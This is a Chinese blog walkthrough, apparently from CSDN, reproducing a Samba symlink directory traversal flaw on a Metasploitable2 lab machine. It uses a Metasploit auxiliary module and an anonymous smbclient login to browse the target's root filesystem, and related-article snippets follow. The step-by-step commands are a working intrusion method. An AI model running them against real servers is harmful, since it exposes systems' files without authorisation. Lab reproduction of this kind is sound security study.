复现Samba sysmlink默认配置目录遍历漏洞

于 2024-04-02 13:37:07 发布
阅读量494 收藏 7
点赞数 5
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18780551/article/details/137267168
版权

复现Samba sysmlink默认配置目录遍历漏洞

一、环境基础准备

环境:metaspoitable2

靶机IP:192.168.211.141

打开metaspoitable2查看靶机IP

ifconfig

二、进入kali

打开kali,输入msfconsole,进入msf控制台

msfconsole

在msf中搜索samba

search samba

第0个即为需要使用的漏洞,输入 use 0进行利用

use 0

输入show options 查看需要设置的参数

show options

将smbshare设置为tmp

set smbshare tmp

设置靶机IP

set rhost 192.168.211.141

直接run利用可能会发生报错

protocol negotiation failed: NT_STATUS_CONNECTION_RESET

所以需要先在配置文件/etc/samba/smb.conf的global设置下添加

client min protocol = CORE

client max protocol = SMB3

新建一个控制台窗口,输入命令修改配置文件

vim /etc/samba/smb.conf

将下面两行粘贴到配置文件中[global]下面

client min protocol = CORE
client max protocol = SMB3

输入完保存退出即可

三、连接靶机

使用smbclient命令连接靶机的tmp文件夹

smbclient //192.168.211.141/tmp

提示输入密码,直接按下回车即可,这样就是使用匿名模式登录

再输入cd rootfs开始执行命令

cd rootfs

输入ls即可查看文件

ls

NAVI.electroNic
关注
漏洞验证】Metasploitable2靶机漏洞复现
weixin_43486390的博客
12-10 2878
文章目录Metasploitable2靶机漏洞复现1、TWiki 'rev' Parameter Arbitrary Command Execution2、VNC Server 'password' Password3、Bind Shell Backdoor Detection4、UnrealIRCd Backdoor(ircd) Metasploitable2靶机漏洞复现 环境IP:192.16...
linux samba 漏洞 exp,smaba漏洞总结
weixin_39816448的博客
05-20 1786
由于我无法确定具体影响的具体版本,所以samba版本在4.6.4之下都视为有漏洞存在。1,Samba任意文件访问漏洞(CNA-2004-0815)漏洞简介Samba是一个开源/免费软件套件,为SMB / CIFS客户提供无缝文件和打印服务。远程利用Samba中的输入验证漏洞允许攻击者访问指定共享路径之外的文件和目录漏洞利用条件漏洞使用了samba软件套件,通常在445端口或者139端口。影响版本...
Metasploitable2靶机之第五篇--Samba sysmlink 默认配置目录遍历漏洞(CVE-2010-0926)
千寻的博客
04-02 1453
文章目录环境原理漏洞复现第一步 发现漏洞第二步 ,启动metasploit第三步选择漏洞库第四步 设置参数,开始攻击第五步 利用成功,打开共享目录注意 smbclient 报错:摘抄 环境 主机 地址 Metasploitable2 192.168.232.202 kali-linux 192.168.232.129 原理 漏洞复现 第一步 发现漏洞 第二步 ,启动metasploit msfconsole 第三步选择漏洞库 search samba use auxiliary
linux samba 漏洞 exp,CVE-2010-0926 Samba smbd默认配置目录遍历漏洞-漏洞情报、漏洞详情、安全漏洞、CVE - 安全客,安全资讯平台...
weixin_34264495的博客
05-20 430
source: http://www.securityfocus.com/bid/38111/infoSamba is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input.Exploits would allow...
Linux系统中修复SambaCry漏洞(CVE-2017-7494)
weixin_34372728的博客
08-08 1397
Samba 很久以来一直是为 *nix 系统上的 Windows 客户端提供共享文件和打印服务的标准。家庭用户,中型企业和大型公司都在使用它,它作为最佳解决方案在多种操作系统共存的环境中脱颖而出。 由于广泛使用的工具很可能发生这种情况,大多数 Samba 安装都面临着可能利用已知漏洞的攻击的风险,这个漏洞直到 WannaCry 勒索软件攻击的新闻出来之...
centos7.5 Samba-4.10.16安全漏洞修复
最新发布
linux小菜鸡的博客
10-26 1221
​ 先使用ps命令查看到smbd进程id,然后使用kill杀掉进程。漏洞原因是因为smb启用了较低版本的协议。操作系统:centos 7.5。Samba版本:4.10.16。保存退出后重启Samba
Samba漏洞详解
m0_64593235的博客
04-19 434
samba漏洞详解
samba 配置文件,用于配置samba服务器的共享目录
10-15
添加部分每一行有注释,有需要的可以看看
Samba服务器配置方法1_Samba服务器配置方法_samba_
09-29
在linux中安装Samba服务器配置方法。
samba 服务器的配置文件 smb.conf
02-21
Ubuntu 系统, samba 服务器的配置文件, samba安装后默认是通过guest 访问的, 感觉不太安全, 而且不方便使用指定的用户名和密码去访问对应权限的文件, 改为需要用户名密码才能访问samba, 注:必须通过smbpasswd -a ...
ubuntu16.04通过网络访问windows共享文件夹
u010783226的专栏
12-24 834
SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通 一. 从Ubuntu Desktop访问Windows下samba共享文件夹 1. 安装samba windows的共享文件夹貌似是用的 SMB 协议,所以先给ubuntu装上SMB: apt-get install smb apt-get install smbclient 2. 修改配置 装好之后,据说ubuntu默认的协议比较旧,连不上,所以改一下配置: sudo ge.
ubuntu 20.04 smbclient 联不上windows 服务器
悠远的博客
06-09 1225
打开 /etc/samba/smb.conf global 下加这俩 client min protocol = CORE client max protocol = SMB3
python学习之路19-文件IO
Crazy For Code
05-18 702
本篇博客将介绍Python的文件处理和相关输入输出,将涉及到文件对象(它的内建函数,内建方法和属性),标准文件和文件系统的访问方法,文件执行.(欢迎大家
samba -smb开启v2协议
lxy___的博客
03-16 2835
samba
samba漏洞修补——升级 4.15.5版本
fanggeyan的博客
07-19 3394
samba漏洞修补——升级4.15.5版本。
基于BT5R3-Metasploit完成Linux Metasploit靶机中的Samba服务漏洞复现
F14735971227的博客
01-20 751
back track5R3对Linux Metasploit中的samba服务漏洞的利用
samba升级_Ubuntu20.04升级后共享文件打不开处理方法
weixin_39549899的博客
12-08 1378
很多用户反应,升级Ubuntu20.04之后,之前常用的共享文件夹打不开了。具体表现有以下两种情况:症状一、Ubuntu20.04打不开老版本系统(例如Ubuntu16.04,Windows xp,路由器以及NAS)等创建的共享文件夹;Ubuntu20.04访问Windows xp的共享文件如上图,我使用的最新版本Ubuntu20.04打不开Windows xp共享的文件夹。使用本文末尾的解决方法...
smb.conf文件详细介绍
热门推荐
qk的专栏
12-12 1万+
Name smb.conf — The configuration file for the Samba suite SYNOPSIS The smb.conf file is a configuration file for the Samba suite. smb.conf contains runtime configuration information for the S
linux 漏洞靶机,【漏洞验证】Metasploitable2靶机漏洞复现
weixin_39796878的博客
05-16 1075
文章目录Metasploitable2靶机漏洞复现1、TWiki 'rev' Parameter Arbitrary Command Execution2、VNC Server 'password' Password3、Ingreslock 后门漏洞4、UnrealIRCd Backdoor(ircd)5、 PHP-CGI Query String Parameter Injection Arbi...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值